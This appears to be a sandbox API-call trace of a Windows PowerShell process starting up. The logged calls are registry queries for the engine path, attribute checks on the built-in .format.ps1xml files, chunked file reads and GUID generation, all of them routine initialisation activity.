	[0349.500] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.501] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd948 | out: phkResult=0x1cd948*=0x320) returned 0x0
	[0349.501] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd95c, lpData=0x0, lpcbData=0x1cd958*=0x0 | out: lpType=0x1cd95c*=0x1, lpData=0x0, lpcbData=0x1cd958*=0x74) returned 0x0
	[0349.501] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd8cc, lpData=0x0, lpcbData=0x1cd8c8*=0x0 | out: lpType=0x1cd8cc*=0x1, lpData=0x0, lpcbData=0x1cd8c8*=0x74) returned 0x0
	[0349.501] CoTaskMemAlloc (cb=0x78) returned 0x3f6470
	[0349.501] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd89c, lpData=0x3f6470, lpcbData=0x1cd898*=0x74 | out: lpType=0x1cd89c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd898*=0x74) returned 0x0
	[0349.501] CoTaskMemFree (pv=0x3f6470) 
	[0349.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0349.502] SetErrorMode (uMode=0x1) returned 0x1
	[0349.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0349.502] SetErrorMode (uMode=0x1) returned 0x1
	[0349.502] SetErrorMode (uMode=0x1) returned 0x1
	[0349.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0349.502] SetErrorMode (uMode=0x1) returned 0x1
	[0349.502] SetErrorMode (uMode=0x1) returned 0x1
	[0349.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0349.502] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] SetErrorMode (uMode=0x1) returned 0x1
	[0349.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0349.504] SetErrorMode (uMode=0x1) returned 0x1
	[0349.505] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0349.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.505] CoTaskMemFree (pv=0x436d30) 
	[0349.507] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0349.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.507] CoTaskMemFree (pv=0x436d30) 
	[0349.507] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0349.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.507] CoTaskMemFree (pv=0x436d30) 
	[0349.507] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0349.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.508] CoTaskMemFree (pv=0x436d30) 
	[0349.508] SetErrorMode (uMode=0x1) returned 0x1
	[0349.508] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0349.508] GetFileType (hFile=0x2f0) returned 0x1
	[0349.508] SetErrorMode (uMode=0x1) returned 0x1
	[0349.508] GetFileType (hFile=0x2f0) returned 0x1
	[0349.508] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.510] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.510] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.510] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.511] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.511] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.511] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0349.511] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e21d2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e21d2*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0349.511] ReadFile (in: hFile=0x2f0, lpBuffer=0x32e2c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x32e2c88*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0349.511] SetErrorMode (uMode=0x1) returned 0x1
	[0349.511] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0349.511] SetErrorMode (uMode=0x1) returned 0x1
	[0349.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.512] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x2f0) returned 0x0
	[0349.512] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0349.512] CoTaskMemAlloc (cb=0x5a) returned 0x444bf0
	[0349.512] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x444bf0, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0349.512] CoTaskMemFree (pv=0x444bf0) 
	[0349.512] RegCloseKey (hKey=0x2f0) returned 0x0
	[0349.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.516] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5af5b8b0, Data2=0xe4e8, Data3=0x48f1, Data4=([0]=0xa2, [1]=0xdc, [2]=0x25, [3]=0xde, [4]=0x6e, [5]=0x8, [6]=0xb6, [7]=0xc5))) returned 0x0
	[0349.519] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4079f403, Data2=0xe8e9, Data3=0x4b88, Data4=([0]=0x90, [1]=0x17, [2]=0xa9, [3]=0xe1, [4]=0xb1, [5]=0x1e, [6]=0xbd, [7]=0xc6))) returned 0x0
	[0349.521] SetErrorMode (uMode=0x1) returned 0x1
	[0349.521] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0349.791] GetFileType (hFile=0x2f0) returned 0x1
	[0349.791] SetErrorMode (uMode=0x1) returned 0x1
	[0349.791] GetFileType (hFile=0x2f0) returned 0x1
	[0349.791] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.792] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.793] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.793] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.793] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.794] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0xfb2, lpOverlapped=0x0) returned 1
	[0349.794] ReadFile (in: hFile=0x2f0, lpBuffer=0x330cf0a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330cf0a*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0349.794] ReadFile (in: hFile=0x2f0, lpBuffer=0x330d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x330d7f0*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0349.794] SetErrorMode (uMode=0x1) returned 0x1
	[0349.794] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0349.795] SetErrorMode (uMode=0x1) returned 0x1
	[0349.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0349.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x2f0) returned 0x0
	[0349.795] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0349.795] CoTaskMemAlloc (cb=0x5a) returned 0x4443a0
	[0349.795] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x4443a0, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0349.795] CoTaskMemFree (pv=0x4443a0) 
	[0349.795] RegCloseKey (hKey=0x2f0) returned 0x0
	[0349.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0349.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0349.797] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x47fbd6d4, Data2=0x6422, Data3=0x4f4a, Data4=([0]=0xa7, [1]=0xd7, [2]=0x86, [3]=0x78, [4]=0xbb, [5]=0x8, [6]=0xdb, [7]=0xf0))) returned 0x0
	[0349.798] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xea873dd4, Data2=0x787c, Data3=0x41d4, Data4=([0]=0xb0, [1]=0x7f, [2]=0x86, [3]=0x71, [4]=0x39, [5]=0x85, [6]=0x6, [7]=0x6f))) returned 0x0
	[0349.798] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xe372c253, Data2=0xe6bb, Data3=0x4ead, Data4=([0]=0xbb, [1]=0x21, [2]=0xf5, [3]=0xd3, [4]=0xe8, [5]=0x5d, [6]=0x50, [7]=0xb4))) returned 0x0
	[0349.798] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xbbb5791d, Data2=0x2873, Data3=0x41c1, Data4=([0]=0x83, [1]=0xd5, [2]=0x69, [3]=0xc9, [4]=0x8f, [5]=0x89, [6]=0xdc, [7]=0xd5))) returned 0x0
	[0349.799] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5091d97b, Data2=0x4851, Data3=0x4346, Data4=([0]=0x90, [1]=0x22, [2]=0x5f, [3]=0xfe, [4]=0x66, [5]=0x33, [6]=0x72, [7]=0x6a))) returned 0x0
	[0349.799] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xb26df084, Data2=0xe44f, Data3=0x42d7, Data4=([0]=0xa4, [1]=0x79, [2]=0x91, [3]=0xbc, [4]=0x91, [5]=0xd2, [6]=0xbd, [7]=0x84))) returned 0x0
	[0349.799] SetErrorMode (uMode=0x1) returned 0x1
	[0349.799] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0349.799] GetFileType (hFile=0x2f0) returned 0x1
	[0349.799] SetErrorMode (uMode=0x1) returned 0x1
	[0349.799] GetFileType (hFile=0x2f0) returned 0x1
	[0349.799] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.801] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.801] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.801] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.802] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.802] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.803] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0xaca, lpOverlapped=0x0) returned 1
	[0349.803] ReadFile (in: hFile=0x2f0, lpBuffer=0x3358b82, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3358b82*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
